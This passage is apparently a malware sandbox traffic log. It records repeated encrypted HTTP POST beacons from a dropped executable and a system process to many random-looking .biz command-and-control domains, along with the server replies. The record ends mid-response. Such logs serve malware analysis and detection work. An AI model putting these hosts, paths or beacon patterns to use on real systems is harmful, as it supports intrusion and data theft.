                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.156898022 CEST828OUTData Raw: 82 4e d6 e8 62 cf 26 b8 30 03 00 00 d9 f0 d3 ea 2a 64 9a e8 dd 79 f8 18 5d df ab be 3b c6 24 2a 75 41 ea cb d5 ca ec 32 c6 af 9a d3 53 69 c4 e2 0f 40 11 50 62 c1 af e1 e4 67 00 a3 83 47 3d 43 73 60 a9 ea 8a a7 c9 cc c6 04 89 ab fd e0 3b 4b 44 b1
                                                                                                                                                                                                                                                                                                          Data Ascii: Nb&0*dy];$*uA2Si@PbgG=Cs`;KDddovgLss&n_lgq==DB_lcjc;^{|BK'<]A] `ac)'QF/-|=4V!fBJpIcKXk_wcEgj
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.767970085 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:56 GMT
                                                                                                                                                                                                                                                                                                          Content-Length: 94
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.770220995 CEST355OUTPOST /wqmolrbsijpjbu HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: myups.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.770277977 CEST828OUTData Raw: bd 21 cf a6 29 7c 1d dc 30 03 00 00 24 0c 2b 0d 6e 79 73 08 a5 23 51 2e 95 8c e8 cd 40 09 c8 73 df b6 0d 46 07 fe f2 d2 67 4b 53 af 13 8d db d9 bf 76 77 28 c6 a1 eb 7c 08 e5 ee f9 51 58 ba ea 99 55 d9 d8 b2 ab c3 16 9d 89 77 2c 5f 25 90 56 ff 39
                                                                                                                                                                                                                                                                                                          Data Ascii: !)|0$+nys#Q.@sFgKSvw(|QXUw,_%V9_WbH2l?e(BdZf&M?2HJ\EQKU.1.w4P#/:pD.}$rGO#)7s#I[n]r.yyFDnS{H~H
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.956769943 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:56 GMT
                                                                                                                                                                                                                                                                                                          Content-Length: 94
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          80192.168.2.55006118.141.10.107807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.592171907 CEST348OUTPOST /rxkip HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.592197895 CEST778OUTData Raw: 6e 4d 49 fb a6 55 64 50 fe 02 00 00 ca f7 97 e9 a6 83 06 9b 01 b2 e2 be ef 9a 45 2c f3 2e af 62 1d 0b 4f fe 01 24 93 f4 9a 24 83 4f d6 c0 50 af 46 19 09 c3 b5 39 59 23 a7 bc 9f cf 72 c2 88 85 b0 4c a7 25 f5 ae da e3 b0 80 3d c5 ed c5 32 b4 18 c4
                                                                                                                                                                                                                                                                                                          Data Ascii: nMIUdPE,.bO$$OPF9Y#rL%=2a#0&Sh1<T@Bc5qxj53t?a0T'(ud""ihZRQop1+(C+mD?KSK+C:t$W*"^


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          81192.168.2.55006218.141.10.107807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.919321060 CEST353OUTPOST /rgwkboikrm HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.919321060 CEST778OUTData Raw: e9 1a 1f f8 a2 30 59 19 fe 02 00 00 31 be 32 87 04 05 46 8f c7 02 0f 3e 04 b8 1b c0 bb d7 5d 41 3f 72 87 42 58 14 c8 c1 ea 88 1f df e4 26 ce 6b 8c 2c 89 56 fc 82 1f 25 70 91 94 c9 06 a5 c9 e6 a2 a7 be 61 dd 37 31 8b b6 e1 93 fb 92 7f 0d 65 8a 28
                                                                                                                                                                                                                                                                                                          Data Ascii: 0Y12F>]A?rBX&k,V%pa71e(O-*Bv!/$Gv]t2U;'pw(&BH<@#cOEHH<Fzo<1wvFs~~#3j~el9M}
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.266864061 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:58 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=66133e358dcbdbcb083b08d5b586902c|8.46.123.33|1728547737|1728547737|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          82192.168.2.55006354.244.188.17780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.977911949 CEST347OUTPOST /xp HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.977926970 CEST828OUTData Raw: 41 70 c2 dc 4e e4 d1 b0 30 03 00 00 8d ee 7e c1 aa 11 25 4a 7a f5 3c 74 ad fb 5d 46 a2 c7 86 2e 18 7e 5b c1 87 a9 fb fd f8 a9 26 7b 45 fa 66 b2 c6 61 01 61 a9 01 51 cc c1 e9 60 72 a9 95 4a 24 f8 a8 28 bf b3 fc 78 bc 0e b8 db eb ca 16 a7 1b b6 92
                                                                                                                                                                                                                                                                                                          Data Ascii: ApN0~%Jz<t]F.~[&{EfaaQ`rJ$(xb9UfQJM/dlPa$ L(V,]QCM~Q91Z]$-`6:0w>;3u2s>"wu$Zi6su7beTt?E3k2Z|_R(
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.711050034 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:57 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=a8ec139ad8335b71b6464c9fd94658e0|8.46.123.33|1728547737|1728547737|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          83192.168.2.550064208.100.26.24580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.732062101 CEST345OUTPOST /cx HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.732062101 CEST828OUTData Raw: d1 9e af 81 ac 36 aa 87 30 03 00 00 6a 4e 09 ef 0a 2d 7d bb 3b f1 5a f4 33 1d 7f 7f 0d 94 0f 91 8f 99 19 d8 24 2e 76 46 bc 18 b6 8d 40 04 63 a7 3e 6f 88 35 0f d3 fc 67 f6 50 11 34 ac 7a e3 20 72 de 4b 68 aa 24 cd 97 a8 32 03 86 55 73 fc cd 11 08
                                                                                                                                                                                                                                                                                                          Data Ascii: 60jN-};Z3$.vF@c>o5gP4z rKh$2Us6(U~oI8,0I6Y;RE\3kv+sH?./9_]HytzERSH%q%"S5U9PfUWS[,K&Eu}
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.221935987 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:58 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.232933044 CEST356OUTPOST /irsdmqckkulgp HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.232963085 CEST828OUTData Raw: bc d2 92 37 ca fc 54 70 30 03 00 00 f3 35 b1 43 aa d8 09 4e 02 4b 57 5c 6c db 1e b7 18 da 36 bf 5a 20 d9 54 d6 ae 5d 3c a1 d5 59 65 13 6d 48 88 cd a0 c6 47 12 7a e4 71 ef 11 19 93 77 f6 62 a1 ec 39 13 5f 80 6a ce 99 d1 3e c3 b9 a7 1f ac c3 68 e8
                                                                                                                                                                                                                                                                                                          Data Ascii: 7Tp05CNKW\l6Z T]<YemHGzqwb9_j>h]%_Vv )Dvf>BU#SWj/}+\8Ww3Q2/lz|NVQA+U>~k~jaBvOH_iCJ5<S
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.363440990 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:58 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          84192.168.2.55157313.251.16.150807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.469113111 CEST357OUTPOST /mgsjgpoacwottwhx HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gcedd.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.469136000 CEST778OUTData Raw: 38 35 b2 91 de 69 e4 ce fe 02 00 00 48 b7 3e 26 20 52 34 e9 df b7 f7 8c b0 7a 9c 23 fe 4e 0c 91 65 09 d6 07 0c f5 bf 15 f2 00 11 98 fb 53 f2 b6 2b ee 97 f2 63 f3 44 9f a2 54 ce 65 56 78 3a 49 e3 2d 27 56 13 79 c7 fc 38 16 50 94 5b d4 37 0c 3d 83
                                                                                                                                                                                                                                                                                                          Data Ascii: 85iH>& R4z#NeS+cDTeVx:I-'Vy8P[7=6rrcxNx?Ji0UA\*E|{6&2K.~)%Z/mnP1|rM}.`SE,*Sb*VNP@JB~7'-];
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:59.844531059 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:59 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=9e8fc99d29310b177e769dd7bf157182|8.46.123.33|1728547739|1728547739|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          85192.168.2.55157434.211.97.4580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.906064987 CEST354OUTPOST /yxnfodxhcdmnj HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: jpskm.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.906217098 CEST828OUTData Raw: 9c ed 18 ec 66 4b 11 10 30 03 00 00 f0 d0 f2 9e 21 2d ae fb 54 02 27 03 17 9a 94 95 5e d5 48 fb c5 0b b5 f8 ab 52 55 b4 21 ae 15 f5 36 62 a9 17 45 bb ef c2 2a 0f 0d 44 4c b6 27 a9 e8 db 6b 51 12 53 ad 2d e9 bc 2a dd 77 00 9e 53 58 c4 60 98 5b 14
                                                                                                                                                                                                                                                                                                          Data Ascii: fK0!-T'^HRU!6bE*DL'kQS-*wSX`[\(vFEVZ[MjU:HM\`-2-bAAFx3UwnX1qia@:*`"*K;2kzVk8L\*y-%?PR"-O0
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:59.637713909 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:59 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=3bdeefc53c5862397a9d455c2affbe9c|8.46.123.33|1728547739|1728547739|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          86192.168.2.55157554.244.188.17780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:59.669430017 CEST347OUTPOST /lpr HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:59.669457912 CEST828OUTData Raw: 72 90 8a 4f d4 fa d6 0a 30 03 00 00 07 1b 77 43 3f 47 dd f6 7c bc 30 ec 69 b8 0d 5c 15 30 87 94 05 08 77 79 74 ef 79 a7 f8 57 63 94 a3 da bf 04 f6 50 25 4d 86 f0 65 70 5c 6e af ef d5 49 85 88 23 50 59 90 6f 54 11 fb 2a 7e 7b 87 41 cd d9 fd 91 c9
                                                                                                                                                                                                                                                                                                          Data Ascii: rO0wC?G|0i\0wytyWcP%Mep\nI#PYoT*~{A%v*pY69td90#8j%[dvX1J|,{R.Q%A (J[h;0YQ@V1Hf=9*]bp_%h`:=GFM#)
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.396337032 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:00 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=1afde017a613e93b0f8276f83cb59e49|8.46.123.33|1728547740|1728547740|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          87192.168.2.55157618.141.10.10780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.486808062 CEST350OUTPOST /ryoeonf HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.486835957 CEST828OUTData Raw: 0a ca 1d da 35 61 52 93 30 03 00 00 66 1e 36 dc 8f 7a 3f 74 80 03 3a 0a 9d d0 e8 09 59 bb a2 07 b1 84 a2 bb 13 35 84 4f 2a a3 b3 62 1d b1 0d ef f1 26 e8 b9 ec e1 9a be 87 07 09 92 f4 77 c7 a9 ce ea d7 e1 0e 0f 45 a9 52 fa 87 a0 45 8c ad f0 84 23
                                                                                                                                                                                                                                                                                                          Data Ascii: 5aR0f6z?t:Y5O*b&wERE#0?M~yN^mzWA{!f;u|x^|]JmTE6gu1,Mtf0[H?(8>_lhTcXN_TKlGjeRq%^{IaDUkW,Q X
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.844518900 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
